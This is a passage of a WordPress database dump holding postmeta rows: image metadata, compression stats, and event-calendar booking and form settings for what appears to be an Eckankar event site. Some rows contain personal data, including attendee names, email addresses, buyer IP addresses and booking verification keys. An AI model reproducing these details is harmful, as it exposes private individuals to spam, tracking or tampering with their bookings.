\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:12:\"35.136.41.82\";}}'),(177078,267921,'original-file','2023/02/teacher-bg-updraft-pre-smush-original.jpg'),(177079,267921,'smush-complete','1'),(177080,267921,'smush-info','The file was compressed from 108.14 KB to 108.14 KB saving 0 percent using WP-Optimize'),(177081,267921,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:110732;s:12:\"smushed-size\";i:110732;s:15:\"savings-percent\";d:0;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:110732;s:10:\"compressed\";i:110732;}s:6:\"medium\";a:2:{s:8:\"original\";i:1664;s:10:\"compressed\";i:1664;}s:5:\"large\";a:2:{s:8:\"original\";i:8988;s:10:\"compressed\";i:8988;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:1038;s:10:\"compressed\";i:1038;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:5800;s:10:\"compressed\";i:5800;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:2355;s:10:\"compressed\";i:2355;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:3659;s:10:\"compressed\";i:3659;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:2794;s:10:\"compressed\";i:2794;}s:8:\"tileview\";a:2:{s:8:\"original\";i:2596;s:10:\"compressed\";i:2596;}}}'),(188208,268837,'mec_repeat_end_at_occurrences',''),(188209,268837,'mec_repeat_end_at_date',''),(188207,268837,'mec_repeat_end',''),(177277,267974,'_field_180','Santiago'),(177278,267974,'_field_181','jiuuumaluk@gmail.com'),(177279,267974,'_field_182','UT'),(177280,267974,'_field_183','US'),(177281,267974,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(177282,267974,'_form_id','17'),(177283,267974,'_seq_num','15'),(188205,268837,'mec_repeat_type',''),(188206,268837,'mec_repeat_interval','1'),(188204,268837,'mec_repeat_status','0'),(177104,267933,'_wp_attached_file','2023/02/sri-harold-shaking-hands-transp-2.png'),(177105,267933,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:450;s:6:\"height\";i:388;s:4:\"file\";s:45:\"2023/02/sri-harold-shaking-hands-transp-2.png\";s:8:\"filesize\";i:307308;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:45:\"sri-harold-shaking-hands-transp-2-300x259.png\";s:5:\"width\";i:300;s:6:\"height\";i:259;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:131239;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:45:\"sri-harold-shaking-hands-transp-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:43379;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:45:\"sri-harold-shaking-hands-transp-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:155601;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:45:\"sri-harold-shaking-hands-transp-2-450x324.png\";s:5:\"width\";i:450;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:241959;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:45:\"sri-harold-shaking-hands-transp-2-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:167806;}s:8:\"tileview\";a:5:{s:4:\"file\";s:45:\"sri-harold-shaking-hands-transp-2-300x388.png\";s:5:\"width\";i:300;s:6:\"height\";i:388;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:204517;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177412,268013,'original-file','2023/02/outlook-online-2-for-adding-domain-updraft-pre-smush-original.png'),(177413,268013,'smush-complete','1'),(177414,268013,'smush-info','The file was compressed from 37.57 KB to 19.30 KB saving 48.63 percent using WP-Optimize'),(177415,268013,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:38467;s:12:\"smushed-size\";i:19762;s:15:\"savings-percent\";d:48.63;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:38467;s:10:\"compressed\";i:19762;}s:6:\"medium\";a:2:{s:8:\"original\";i:8566;s:10:\"compressed\";i:4730;}s:5:\"large\";a:2:{s:8:\"original\";i:53171;s:10:\"compressed\";i:21016;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:6464;s:10:\"compressed\";i:3714;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:36247;s:10:\"compressed\";i:14644;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:18264;s:10:\"compressed\";i:8172;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:25060;s:10:\"compressed\";i:10700;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19448;s:10:\"compressed\";i:8760;}s:8:\"tileview\";a:2:{s:8:\"original\";i:22578;s:10:\"compressed\";i:9645;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:87065;s:10:\"compressed\";i:34079;}}}'),(177416,268014,'original-file','2023/02/outlook-online-3-for-adding-domain-updraft-pre-smush-original.png'),(177417,268014,'smush-complete','1'),(177418,268014,'smush-info','The file was compressed from 53.22 KB to 26.14 KB saving 50.88 percent using WP-Optimize'),(177419,268014,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:54495;s:12:\"smushed-size\";i:26770;s:15:\"savings-percent\";d:50.88;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:54495;s:10:\"compressed\";i:26770;}s:6:\"medium\";a:2:{s:8:\"original\";i:10639;s:10:\"compressed\";i:5749;}s:5:\"large\";a:2:{s:8:\"original\";i:69888;s:10:\"compressed\";i:28004;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:7053;s:10:\"compressed\";i:3963;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:47108;s:10:\"compressed\";i:18920;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:20187;s:10:\"compressed\";i:8941;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:31934;s:10:\"compressed\";i:13392;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:23238;s:10:\"compressed\";i:10278;}s:8:\"tileview\";a:2:{s:8:\"original\";i:29822;s:10:\"compressed\";i:12717;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:114768;s:10:\"compressed\";i:45589;}}}'),(177106,267933,'original-file','2023/02/sri-harold-shaking-hands-transp-2-updraft-pre-smush-original.png'),(177107,267933,'smush-complete','1'),(177108,267933,'smush-info','The file was compressed from 300.11 KB to 87.48 KB saving 70.85 percent using WP-Optimize'),(177109,267933,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:307308;s:12:\"smushed-size\";i:89576;s:15:\"savings-percent\";d:70.85;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:307308;s:10:\"compressed\";i:89576;}s:6:\"medium\";a:2:{s:8:\"original\";i:131239;s:10:\"compressed\";i:40799;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:43379;s:10:\"compressed\";i:14268;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:155601;s:10:\"compressed\";i:49557;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:241959;s:10:\"compressed\";i:79224;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:167806;s:10:\"compressed\";i:55172;}s:8:\"tileview\";a:2:{s:8:\"original\";i:204517;s:10:\"compressed\";i:65158;}}}'),(177110,267942,'mec_transaction_id','HPX73073'),(177111,267942,'mec_user_id','1000012'),(177112,267942,'mec_verified','1'),(177113,267942,'mec_verification_key','bbb8c5eeabd23b8185bc9d9ee4722fff'),(177114,267942,'mec_cancellation_key','4d2b168e39ea8fea9c818200b827c88c'),(177115,267942,'mec_confirmed','1'),(177116,267942,'mec_event_id','267730'),(177117,267942,'mec_date','1676197800:1676244600'),(177118,267942,'mec_ticket_id',',1,'),(177119,267942,'mec_booking_time','2023-02-08 15:55:16'),(177120,267942,'mec_all_dates','a:0:{}'),(177121,267942,'mec_other_dates','a:0:{}'),(177122,267942,'mec_attention_time','1676197800:1676244600'),(177123,267942,'mec_attention_time_start','1676197800'),(177124,267942,'mec_attention_time_end','1676244600'),(177125,267942,'mec_book_date_submit','20230208155516'),(177126,267942,'mec_booking_location','129'),(177127,267942,'mec_ticket_price_1','0'),(177128,267942,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:19:\"lynnie626@gmail.com\";s:4:\"name\";s:12:\"Lynn gardner\";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:13:\"65.130.42.181\";}}'),(177129,267942,'mec_price','0'),(177130,267942,'mec_gateway','MEC_gateway_free'),(177131,267942,'mec_gateway_label','Free'),(177420,268012,'original-file','2023/02/outlook-online-1-updraft-pre-smush-original.png'),(177421,268012,'smush-complete','1'),(177422,268012,'smush-info','The file was compressed from 94.90 KB to 25.95 KB saving 72.66 percent using WP-Optimize'),(177423,268012,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:97175;s:12:\"smushed-size\";i:26569;s:15:\"savings-percent\";d:72.66;s:10:\"sizes-info\";a:7:{s:4:\"full\";a:2:{s:8:\"original\";i:97175;s:10:\"compressed\";i:26569;}s:6:\"medium\";a:2:{s:8:\"original\";i:23407;s:10:\"compressed\";i:8991;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:12411;s:10:\"compressed\";i:5207;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:37468;s:10:\"compressed\";i:12646;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:58625;s:10:\"compressed\";i:17915;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:47350;s:10:\"compressed\";i:15375;}s:8:\"tileview\";a:2:{s:8:\"original\";i:43236;s:10:\"compressed\";i:15160;}}}'),(177424,268017,'_wp_attached_file','2023/02/for-adding-full-email-junk.png'),(177425,268017,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1578;s:6:\"height\";i:640;s:4:\"file\";s:38:\"2023/02/for-adding-full-email-junk.png\";s:8:\"filesize\";i:39728;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-300x122.png\";s:5:\"width\";i:300;s:6:\"height\";i:122;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:8584;}s:5:\"large\";a:5:{s:4:\"file\";s:39:\"for-adding-full-email-junk-1024x415.png\";s:5:\"width\";i:1024;s:6:\"height\";i:415;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55448;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:5146;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-768x311.png\";s:5:\"width\";i:768;s:6:\"height\";i:311;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:37540;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:15038;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:24895;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18691;}s:8:\"tileview\";a:5:{s:4:\"file\";s:38:\"for-adding-full-email-junk-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:18855;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:39:\"for-adding-full-email-junk-1536x623.png\";s:5:\"width\";i:1536;s:6:\"height\";i:623;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:89834;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(177368,268005,'_wp_attached_file','2023/02/favicon-g3.png'),(177369,268005,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:22:\"2023/02/favicon-g3.png\";s:8:\"filesize\";i:105026;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:22:\"favicon-g3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48236;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:22:\"favicon-g3-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:19726;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:22:\"favicon-g3-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48236;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:22:\"favicon-g3-474x324.png\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:66950;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:22:\"favicon-g3-391x260.png\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:50400;}s:8:\"tileview\";a:5:{s:4:\"file\";s:22:\"favicon-g3-300x400.png\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:55400;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(188202,268837,'mec_end_time_ampm','PM'),(188203,268837,'mec_end_day_seconds','52200'),(179833,268244,'one_occurrence','0'),(179832,268244,'mec_allday','0'),(179831,268244,'mec_certain_weekdays','a:0:{}'),(179830,268244,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(179829,268244,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-04-01\";s:4:\"hour\";s:1:\"1\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-04-01\";s:4:\"hour\";s:1:\"2\";s:7:\"minutes\";s:1:\"0\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(179826,268244,'mec_currency','a:0:{}'),(179827,268244,'mec_additional_organizer_ids','a:0:{}'),(179828,268244,'mec_additional_location_ids','a:0:{}'),(179825,268244,'mec_cost',''),(179824,268244,'mec_more_info_target','_self'),(179823,268244,'mec_more_info_title',''),(179822,268244,'mec_more_info',''),(179821,268244,'mec_read_more',''),(179820,268244,'mec_organizer_id','1'),(179819,268244,'mec_dont_show_map','0'),(179818,268244,'mec_location_id','184'),(179817,268244,'mec_color',''),(179816,268244,'protect_children',''),(179815,268243,'_edit_last','15'),(179814,268243,'_edit_lock','1679630869:15'),(179813,268243,'_dp_original','268210'),(179811,268243,'_thumbnail_id','267578'),(179810,268243,'passster_area_shortcode',''),(179809,268243,'boldgrid_in_page_containers','1'),(179808,268243,'passster_protection_type','password'),(179807,268243,'passster_activate_protection',NULL),(179806,268243,'passster_activate_global_protection',NULL),(177318,267990,'_wp_attached_file','2023/02/waterfall-5-notxt.jpg'),(177319,267990,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1170;s:6:\"height\";i:430;s:4:\"file\";s:29:\"2023/02/waterfall-5-notxt.jpg\";s:8:\"filesize\";i:101284;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-300x110.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:110;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8093;}s:5:\"large\";a:5:{s:4:\"file\";s:30:\"waterfall-5-notxt-1024x376.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:376;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:66025;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:5440;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-768x282.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:282;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41026;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16696;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:27942;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19746;}s:8:\"tileview\";a:5:{s:4:\"file\";s:29:\"waterfall-5-notxt-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20075;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(179801,268243,'mec_moved_online_link',''),(179802,268243,'mec_cancelled_reason',''),(179803,268243,'mec_display_cancellation_reason_in_single_page',''),(179804,268243,'boldgrid_hide_page_title','0'),(179805,268243,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(179799,268243,'mec_fields','a:0:{}'),(179800,268243,'mec_event_status','EventScheduled'),(179797,268243,'mec_bfixed_fields','a:0:{}'),(179798,268243,'mec_op','a:0:{}'),(179796,268243,'mec_reg_fields','a:0:{}'),(179795,268243,'mec_reg_fields_global_inheritance','1'),(179794,268243,'mec_ticket_variations','a:0:{}'),(179793,268243,'mec_ticket_variations_global_inheritance','1'),(179792,268243,'mec_fees','a:0:{}'),(179791,268243,'mec_fees_global_inheritance','1'),(179790,268243,'mec_tickets','a:0:{}'),(177326,267990,'original-file','2023/02/waterfall-5-notxt-updraft-pre-smush-original.jpg'),(177327,267990,'smush-complete','1'),(177328,267990,'smush-info','The file was compressed from 98.91 KB to 93.05 KB saving 5.93 percent using WP-Optimize'),(177329,267990,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:101284;s:12:\"smushed-size\";i:95281;s:15:\"savings-percent\";d:5.93;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:101284;s:10:\"compressed\";i:95281;}s:6:\"medium\";a:2:{s:8:\"original\";i:8093;s:10:\"compressed\";i:8027;}s:5:\"large\";a:2:{s:8:\"original\";i:66025;s:10:\"compressed\";i:63513;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:5440;s:10:\"compressed\";i:5374;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:41026;s:10:\"compressed\";i:39506;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:16696;s:10:\"compressed\";i:16558;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:27942;s:10:\"compressed\";i:27337;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:19746;s:10:\"compressed\";i:19276;}s:8:\"tileview\";a:2:{s:8:\"original\";i:20075;s:10:\"compressed\";i:19982;}}}'),(179737,32074,'passster_area_shortcode',''),(179738,32170,'passster_area_shortcode',''),(179785,268243,'mec_advanced_days','a:0:{}'),(179786,268243,'mec_in_days',''),(179787,268243,'mec_not_in_days',''),(179788,268243,'mec_hourly_schedules','a:0:{}'),(179789,268243,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(179736,261866,'passster_area_shortcode',''),(179735,31882,'passster_area_shortcode',''),(177499,268025,'mec_color',''),(177500,268025,'mec_location_id','118'),(177501,268025,'mec_dont_show_map','0'),(177502,268025,'mec_organizer_id','1'),(177503,268025,'mec_read_more',''),(177504,268025,'mec_more_info',''),(177505,268025,'mec_more_info_title',''),(177506,268025,'mec_more_info_target','_self'),(177507,268025,'mec_cost',''),(177508,268025,'mec_currency','a:0:{}'),(177509,268025,'mec_additional_organizer_ids','a:0:{}'),(177510,268025,'mec_additional_location_ids','a:0:{}'),(177511,268025,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-03-05\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-03-05\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(177512,268025,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(177513,268025,'mec_certain_weekdays','a:0:{}'),(177514,268025,'mec_allday','0'),(177515,268025,'one_occurrence','0'),(177516,268025,'mec_hide_time','0'),(177517,268025,'mec_hide_end_time','0'),(177518,268025,'mec_comment',''),(177519,268025,'mec_timezone','global'),(177520,268025,'mec_countdown_method','global'),(177521,268025,'mec_public','1'),(177522,268025,'mec_start_date','2023-03-05'),(177523,268025,'mec_start_time_hour','10'),(177524,268025,'mec_start_time_minutes','30'),(177525,268025,'mec_start_time_ampm','AM'),(177526,268025,'mec_start_day_seconds','37800'),(177527,268025,'mec_end_date','2023-03-05'),(177528,268025,'mec_end_time_hour','11'),(177529,268025,'mec_end_time_minutes','30'),(177530,268025,'mec_end_time_ampm','PM'),(177531,268025,'mec_end_day_seconds','84600'),(177532,268025,'mec_repeat_status','0'),(177533,268025,'mec_repeat_type',''),(177534,268025,'mec_repeat_interval','1'),(177535,268025,'mec_repeat_end',''),(177536,268025,'mec_repeat_end_at_occurrences',''),(177537,268025,'mec_repeat_end_at_date',''),(177538,268025,'mec_advanced_days','a:0:{}'),(177539,268025,'mec_in_days',''),(177540,268025,'mec_not_in_days',''),(177541,268025,'mec_hourly_schedules','a:0:{}'),(177542,268025,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"1\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:1:\"1\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(177543,268025,'mec_tickets','a:1:{i:1;a:17:{s:4:\"name\";s:32:\"Experience HU, The Sound of Soul\";s:22:\"ticket_start_time_hour\";s:2:\"10\";s:24:\"ticket_start_time_minute\";s:2:\"30\";s:22:\"ticket_start_time_ampm\";s:2:\"AM\";s:20:\"ticket_end_time_hour\";s:2:\"11\";s:22:\"ticket_end_time_minute\";s:2:\"30\";s:20:\"ticket_end_time_ampm\";s:2:\"PM\";s:11:\"description\";s:13:\"Register 